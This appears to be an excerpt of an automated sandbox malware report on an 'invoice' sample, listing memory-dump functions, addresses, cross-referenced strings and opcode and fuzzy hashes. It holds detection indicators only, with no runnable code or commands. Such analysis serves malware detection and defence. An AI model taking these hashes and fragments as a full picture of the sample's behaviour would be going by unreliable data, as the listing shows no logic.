PH^q, xrefs: 02F9CC70
PH^q, xrefs: 02F9CC5F

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 35e8894b85d46c8ffe30dc78f6c3bbb4a7fc1e2e0cf60db848c601b4d687d884
Instruction ID: c2236b631345cba30eed3af921ba60997cca1166d40057c60394bdec1e2ffa50
Opcode Fuzzy Hash: 35e8894b85d46c8ffe30dc78f6c3bbb4a7fc1e2e0cf60db848c601b4d687d884
Instruction Fuzzy Hash: 9E81D574E00258CFEB14DFAAD894A9DBBF2BF88340F10C06AD519AB365DB309985CF50

Function 02F9C738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9C9A0
PH^q, xrefs: 02F9C98F

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 315ac4158260bb732ee7570580da47f666e01a30950416bc13d6aa84044790da
Instruction ID: 41580f71f059e4338a9b9c7d42a6836d0f5799e187149a44463d8db89db56685
Opcode Fuzzy Hash: 315ac4158260bb732ee7570580da47f666e01a30950416bc13d6aa84044790da
Instruction Fuzzy Hash: 8881C574E00218CFEB14DFAAD994A9DBBF2BF88300F14C06AD519AB365DB349985CF50

Function 02F9CFAB Relevance: 2.7, Strings: 2, Instructions: 183COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9D1FF
PH^q, xrefs: 02F9D210

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: f9b1b3a3d6a4b8b5eff828dfbc0f51623b3bf9cf905fb21effa80e0f92e69e8a
Instruction ID: b6bb3f29a6cad63bebd7d97472412a05cd39847e3597e1f386c4c2ee1294e2e0
Opcode Fuzzy Hash: f9b1b3a3d6a4b8b5eff828dfbc0f51623b3bf9cf905fb21effa80e0f92e69e8a
Instruction Fuzzy Hash: 0C81B775E00218CFEB14DFAAD984A9DBBF2BF88340F148069D509AB365DB309985CF50

Function 05D481D0 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05D4841B
PH^q, xrefs: 05D4840A

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 604240eebe94440f1da98f55092565923e4f6d07ee8c5851247703f2b4d77883
Instruction ID: 2c9c7271f440919a8b4749b61386f11a584bbd033136e981c4e028195b4765c0
Opcode Fuzzy Hash: 604240eebe94440f1da98f55092565923e4f6d07ee8c5851247703f2b4d77883
Instruction Fuzzy Hash: C581CF74E04218CFDB58CFAAD994AADBBF2BF89300F20846AD419BB354DB749945CF50

Function 02F9C19F Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9C400
PH^q, xrefs: 02F9C3EF

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 24707fe9ccb7b2744e878373fe13d3fa45524257d98d1e6fcdadafc53cc99cf2
Instruction ID: 41dd7c16f611ad4c3905ae72d779e1718baf7ef7f7d75617f6736c05ebbbc92a
Opcode Fuzzy Hash: 24707fe9ccb7b2744e878373fe13d3fa45524257d98d1e6fcdadafc53cc99cf2
Instruction Fuzzy Hash: F661B574E002088FEB18DFAAD984A9DBBF2BF89340F14C06AE518AB365DB345941CF50

Function 05D47B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd33e567c691e00fbb547bdfddc007e2e26eec085f60b966a102afb95236398b
Instruction ID: 7bbcd1a715a66ab7f37b4bf325cedd91f3cf75b2e4c68f49d7856b66ebd9aacd
Opcode Fuzzy Hash: dd33e567c691e00fbb547bdfddc007e2e26eec085f60b966a102afb95236398b
Instruction Fuzzy Hash: CCE19E74E01218CFEB24DFA5D954B9DBBB2FF89304F2081AAD409A7295DB355E85CF10

Function 05D48FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832568eb050d5e2fdbd2af5ca0c93dfde79171382a79c2cd6c68841b9579b658
Instruction ID: b9ef09194d675e8f196cc545ef7a795b3834ec3f3dfbc229b64456f17adcd376
Opcode Fuzzy Hash: 832568eb050d5e2fdbd2af5ca0c93dfde79171382a79c2cd6c68841b9579b658
Instruction Fuzzy Hash: C7D18E78E00218CFDB55DFA9D994B9DBBB2EF89300F1080AAD809AB364DB355D85CF51

Function 02F9E97B Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e27a9b8d520d694f567159bbca534b9fb1a442fc62bb49b8fe8fc2120d42603b
Instruction ID: b5cd2e9f5df71a051dd3a61866548ac6b22706fd1cf2ba336971b8b044455637
Opcode Fuzzy Hash: e27a9b8d520d694f567159bbca534b9fb1a442fc62bb49b8fe8fc2120d42603b
Instruction Fuzzy Hash: 3051CA74E00208DFEB18DFA9D554A9DBBB2FF88300F14C02AE915AB364DB319945CF10

Function 02F9E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af192629109eea0bce069e90d09943e0957ecbb2603812c3bfed308575fede8
Instruction ID: 1725a5ac81b1773d894503b4f24a7bb1354e7fde0409949bc6ae3863625d04f6
Opcode Fuzzy Hash: 8af192629109eea0bce069e90d09943e0957ecbb2603812c3bfed308575fede8
Instruction Fuzzy Hash: 5651A974E00208DFEB18DFAAD554A9DBBF2FF88300F248429E919AB364DB355945CF50

Function 05D47B69 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0cf1e9cceac617967433950eede24faf9785e7f367c1a23150d27f2d35d0c2
Instruction ID: 6f1014a5faffb77f26c7576f911139e3b60314ac1aec6f6df0f7832259157603
Opcode Fuzzy Hash: 0c0cf1e9cceac617967433950eede24faf9785e7f367c1a23150d27f2d35d0c2
Instruction Fuzzy Hash: 3641C2B0E002088BEB18DFAAD8547DEFAF2AF89304F14D06AD418BB254DB355946CF64

Function 05D48FA1 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60291c699ff58688f809b002a3d4f7ff12f70736140e07816d2f50eeb6e43ef
Instruction ID: 7178311c130631402e3661cf251d6ce9952f0881589caf51fe7cd545e60bb42e
Opcode Fuzzy Hash: e60291c699ff58688f809b002a3d4f7ff12f70736140e07816d2f50eeb6e43ef
Instruction Fuzzy Hash: E941D574E002088BEB08DFAAD8546DEFBF2EF89304F10D12AD409BB254EB345946CF50

Function 02F976F1 Relevance: 10.5, Strings: 8, Instructions: 482COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02F9772E
,bq, xrefs: 02F97BA0
(o^q, xrefs: 02F97C0F
(o^q, xrefs: 02F978B2
,bq, xrefs: 02F97B90
(o^q, xrefs: 02F97BFF
(o^q, xrefs: 02F977E9
(o^q, xrefs: 02F97815

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: b5319d966362bd4d2b8bd96f4a1493213f55877a5a4a4b7ea09e5b1d5804b0dd
Instruction ID: e9436cb0b6faa890512cdaf7223dc51f3234254432e50da5a696b68bc2d93677
Opcode Fuzzy Hash: b5319d966362bd4d2b8bd96f4a1493213f55877a5a4a4b7ea09e5b1d5804b0dd
Instruction Fuzzy Hash: DE125770A102088FDF25EF69C984AAEBBF2FF88354F148599E5199B361DB31ED41CB50

Function 02F95F38 Relevance: 2.8, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

Hbq, xrefs: 02F96023
Hbq, xrefs: 02F96056

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 9b1d9326aabb2df92c831d5596525bbbef00953ed1ecea9f125b00574becf1ed
Instruction ID: e259490c684501b4620c703675d4c1e6766c536386a91e058e9cd827de54e883
Opcode Fuzzy Hash: 9b1d9326aabb2df92c831d5596525bbbef00953ed1ecea9f125b00574becf1ed
Instruction Fuzzy Hash: 4F919131B042488FEB159F64C89476E7BA6FF88784F144569EA06CB3A1DF35C841CB91

Function 02F96498 Relevance: 2.7, Strings: 2, Instructions: 234COMMON

Download Yara Rule

Strings

,bq, xrefs: 02F96578
,bq, xrefs: 02F9656E

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 4dcb1a73dff241f7f38b20aa34049fef69d3322601d706068c2e35f4fde8dbfe
Instruction ID: 997a1b9139f2928ee10a48317317ecf1af925eb3d51f40891526905e0b160894
Opcode Fuzzy Hash: 4dcb1a73dff241f7f38b20aa34049fef69d3322601d706068c2e35f4fde8dbfe
Instruction Fuzzy Hash: 54819B31F00505CFEF14CFA9C888A6ABBBABF89384B158169D605DB364DB31E841CF91

Function 05D48A68 Relevance: 2.7, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

(&^q, xrefs: 05D48B83
(bq, xrefs: 05D48C42

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: cd3f4136f276349da30cf54203ac9dcca3f71a5efb6b4c531e0d8602d3ee7a76
Instruction ID: b6dcf70037d042dd6d35581e14c32cf79f0f0cc971d92cbc2e2e9cb72630956f
Opcode Fuzzy Hash: cd3f4136f276349da30cf54203ac9dcca3f71a5efb6b4c531e0d8602d3ee7a76
Instruction Fuzzy Hash: 78717031F002189BCB15DFA9D8506AEBBB6AF88740F144529E406AB380DF309D468BE5

Function 02F9AEBB Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02F9B079
(o^q, xrefs: 02F9AECD

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: (o^q$(o^q
API String ID: 0-1946778100
Opcode ID: d1a3f942c9d0e5beebbed9bb3b397f2ab0d1c5bce54ce7fce7ccb3f061ee6382
Instruction ID: 82f7354c21588677cfa2c08f5b0e775414e234605e9442737f49e482f6e27c5a
Opcode Fuzzy Hash: d1a3f942c9d0e5beebbed9bb3b397f2ab0d1c5bce54ce7fce7ccb3f061ee6382
Instruction Fuzzy Hash: 04619131B001088FEB09DFA8D88466EBBB2BF88755F144565E616DB3A4DF359C41CB90

Function 02F9C18E Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9C400
PH^q, xrefs: 02F9C3EF

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 0e4fc1d6ccac494493e104eb10bab0cdfcd082b12fece5610aba97a3600a67b4
Instruction ID: 396990b3d8f636056f7f61e957f37040f5f1e859e724d8d00ff075479bc0678d
Opcode Fuzzy Hash: 0e4fc1d6ccac494493e104eb10bab0cdfcd082b12fece5610aba97a3600a67b4
Instruction Fuzzy Hash: C171B074E00218CFEB14DFA9D994A9DBBF2FF49340F1080AAE509AB361DB309985CF54

Function 02F99C30 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02F99D84
4'^q, xrefs: 02F99D6D

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 080431942db516edb409fa930d77853e408aabd625ee5d8a65baac2b6bfb23e1
Instruction ID: bb1bb3b72cfb28005aab8ea335d57037b565f5d65122b194bd7634d53b8ca5f6
Opcode Fuzzy Hash: 080431942db516edb409fa930d77853e408aabd625ee5d8a65baac2b6bfb23e1
Instruction Fuzzy Hash: 8E51C7317002099FEB04CF5DC884B6EBBE6EF88354F05846AEA49CB255DB71DC41C791

Function 02F93CB1 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

Xbq, xrefs: 02F93CF6
Xbq, xrefs: 02F93CCD

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 71d8780329de005212063c15bc5c1361b65e08a7f880d028d254e4dfa823ee23
Instruction ID: c991e03bb21652beefba5cb4764508c7d8237230d11f9d847daad5d437e5a20c
Opcode Fuzzy Hash: 71d8780329de005212063c15bc5c1361b65e08a7f880d028d254e4dfa823ee23
Instruction Fuzzy Hash: 0031D435B043688BFF29467E85A427AAAE6ABC4384F1844BAEA07C3394DB75CC45C751

Function 02F98EF8 Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

$^q, xrefs: 02F98FD7
$^q, xrefs: 02F98FB4

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 853da6a66613f8df99bd15a0d01b14547c047b2e10f0a2beae79840669f5f47f
Instruction ID: fb5aa14a900eb746a9ce47e0efc0ce591767e51dc66b0645aa365169fe17bff2
Opcode Fuzzy Hash: 853da6a66613f8df99bd15a0d01b14547c047b2e10f0a2beae79840669f5f47f
Instruction Fuzzy Hash: ED31A3317041054FEF298B39D89473E7BA7AF867D8715645AF122CB292EF28CC81C751

Function 02F90C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02F90F19

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 2820462479e2fb130c8c360aeb4432074fc93db4d9d2022016dc1c7a62b29b0e
Instruction ID: cbbb62029a692b610ffbe90b5a109e5e120a8c4c4d5a69c555cef4455aae5071
Opcode Fuzzy Hash: 2820462479e2fb130c8c360aeb4432074fc93db4d9d2022016dc1c7a62b29b0e
Instruction Fuzzy Hash: 3C52E87890021DCFCB54EF66EA94A9DBBB2FB48301F1045E9D809AB354DB746E85CF81

Function 02F90CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 02F90F19

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 414f0d6f03ef346bbe576a6f612075103879ca8bbeb46bf07f3d6ee3f1a6b186
Instruction ID: 05ffa8f76be3ace0f9a1b31fa39fcfd33ba8f5833b6d9e758a9996f0d51f8721
Opcode Fuzzy Hash: 414f0d6f03ef346bbe576a6f612075103879ca8bbeb46bf07f3d6ee3f1a6b186
Instruction Fuzzy Hash: 2D52E87890021DCFCB54EF66EA94A9DBBB2FB48301F1045A9D809AB354DB746EC5CF81

Function 02F9E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140ac66e29e5959e1a98b57970b242436b7325a0ecbd978de87ec3e3587134f8
Instruction ID: c7cede825fc79b345c70d64254e385fd42bbd98b0de6876e7771f09b6ea894fd
Opcode Fuzzy Hash: 140ac66e29e5959e1a98b57970b242436b7325a0ecbd978de87ec3e3587134f8
Instruction Fuzzy Hash: 5412B87947064E8FA7486B70E2BE92ABF68FB1F3677047D80F01A845449F760888CF21

Function 02F9E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728b8107540b28dbf705e99fd45ecb77302f8d2c2efe9a47aafaf405c652e284
Instruction ID: 8d8b599427dfdf88ab80b1bf6bdca7dea51935679c61c7ade902f3d29e7ae3f2
Opcode Fuzzy Hash: 728b8107540b28dbf705e99fd45ecb77302f8d2c2efe9a47aafaf405c652e284
Instruction Fuzzy Hash: 6312A87547164E8FA7486B70E2BE82ABF68FB1F3677447D80F01A84544AF760888CF65

Function 02F99A10 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66de0d3e26b90218e53994717a26950a9ea1d97e17e7dab6233550c86a3cd266
Instruction ID: 218819194b83cb61fffd39731e9c4ed44d83513fd5f98f07133e3c4d4ec044e7
Opcode Fuzzy Hash: 66de0d3e26b90218e53994717a26950a9ea1d97e17e7dab6233550c86a3cd266
Instruction Fuzzy Hash: 2B91AB31900605CFDF11CF6CC8805AABBB5FF853A4B1AC66ADA28DB355D371E905CBA0

Function 05D49841 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e827e48a66ed56cb0f1110561ce6c49126a0b87747c5d993bbf3cf2ed0fbe2c8
Instruction ID: 092a6ab5fea5b92bbe981190b84c042f9df0decad5657ab6c23a16ab76d2744d
Opcode Fuzzy Hash: e827e48a66ed56cb0f1110561ce6c49126a0b87747c5d993bbf3cf2ed0fbe2c8
Instruction Fuzzy Hash: 39C1AF75E002298FDB64DF69C894BDEBBB2BB88300F1085EAD50DA7290DB705E85CF51

Function 05D49850 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e118180db87abe7cb35b982d9c95d697c85f3185bd17089abba8ccbf7f15277f
Instruction ID: 79d5277cbb7fbe3cc2bd7987d2035b279c7b7556abe4addd5a65f5f1b9ad23e9
Opcode Fuzzy Hash: e118180db87abe7cb35b982d9c95d697c85f3185bd17089abba8ccbf7f15277f
Instruction Fuzzy Hash: C0B19F74E002698FDB64DF69C954BDEBBB2BB88300F1085EAD60DA7290DB705E85CF51

Function 02F980D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c12a5610f28a6c6b36097308ad18780ef0424bbb6baa961ef83d0fdc2fc05f
Instruction ID: c465e2a7e001827bd8d4bbeb6d7573ac247b7a0bd905d54e7ecdfa428c2463ce
Opcode Fuzzy Hash: 80c12a5610f28a6c6b36097308ad18780ef0424bbb6baa961ef83d0fdc2fc05f
Instruction Fuzzy Hash: 73715C35B006098FEF14DF68C884AAE7BE6AF4A3C4B1500A9EA06DB371DB71DC41CB50

Function 05D494F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e34a2d688f8d501ac9a2df9134484186641c7754deb8cf2bd352fa52d0f0bb5
Instruction ID: 2b826693dce912390831b46fe31d32d40373a7df76cb7da729f5c6375ea976bd
Opcode Fuzzy Hash: 9e34a2d688f8d501ac9a2df9134484186641c7754deb8cf2bd352fa52d0f0bb5
Instruction Fuzzy Hash: C661E675E012489FDB08DFE9E994A9EBBF2BF88310F14D469E908BB354DA3099418F50

Function 02F9F71F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcbcb4c3e90c388ddf798dc1050d570ab5b8c65b5fe3918762dd2a7834b9f2a3
Instruction ID: e4a636d567b75645636cb9a1332d539e5ee135f3bc575d3d6570ea53dd413ae8
Opcode Fuzzy Hash: dcbcb4c3e90c388ddf798dc1050d570ab5b8c65b5fe3918762dd2a7834b9f2a3
Instruction Fuzzy Hash: 2561F374E00318DFDB14DFA5D998AADBBB2FF88304F208529D809AB354DB755946CF41

Function 02F9D548 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df34af2731e876f238c5dd4fbe0bb6d2fb3aa633587123865352bf7d353da067
Instruction ID: 725a99ad0335eb2d67876d151aceb226d45572793da5897368318e8b253d6b4e
Opcode Fuzzy Hash: df34af2731e876f238c5dd4fbe0bb6d2fb3aa633587123865352bf7d353da067
Instruction Fuzzy Hash: CD519374E01218DFDB58DFAAD9849DDBBF2BF89300F208169E919AB364DB309905CF40

Function 05D49CD7 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30562c8fbebc8098833fb9da1b36bb48f740e723edd86fab00bbcf5dbd480175
Instruction ID: ce0ee8ab6394b34b0f30a19b1f8f680547ac0776e835963d07e2022cbf4064a0
Opcode Fuzzy Hash: 30562c8fbebc8098833fb9da1b36bb48f740e723edd86fab00bbcf5dbd480175
Instruction Fuzzy Hash: 4E519074E002199FCB04DFA9D5956EEBBF2FF88300F20852AD519AB394DB346A45CF91

Function 02F941A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea26226a5ebab42b9d22ff5d072836e9c9a9d993f99ab43aa0df4cc532e4bf8
Instruction ID: 8257555322b1989d546550e030e6694ca071095712efa095f3c6eb924d8a5a2d
Opcode Fuzzy Hash: 7ea26226a5ebab42b9d22ff5d072836e9c9a9d993f99ab43aa0df4cc532e4bf8
Instruction Fuzzy Hash: 4851BA74E01208CFDB08DFA6D59499DBBF6FF89304B209069E819AB364DB359D42CF50

Function 05D49CE8 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4140620022.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5d40000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd91bccf177b6e1103357812b5f5cf6706a355b4d6f1e258a5faf7272f74cb5
Instruction ID: ce7e2b0830a2bfd931374e06c3f457884fa6ff885b957a2bbdd6ca4e71a75fda
Opcode Fuzzy Hash: efd91bccf177b6e1103357812b5f5cf6706a355b4d6f1e258a5faf7272f74cb5
Instruction Fuzzy Hash: 0251A374E002199FCB04DFA9D595AEEBBF2FF88300F20852AD515AB394DB346A45CF90

Function 02F9A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db7f921601163ab065da9fe1aab2245a091c3d5b79314a1ad447acef0fdfafb
Instruction ID: 882cc725f1b8c2dcbbdacb39e04a63c768b8e841418633bd87c76cbfe967367c
Opcode Fuzzy Hash: 3db7f921601163ab065da9fe1aab2245a091c3d5b79314a1ad447acef0fdfafb
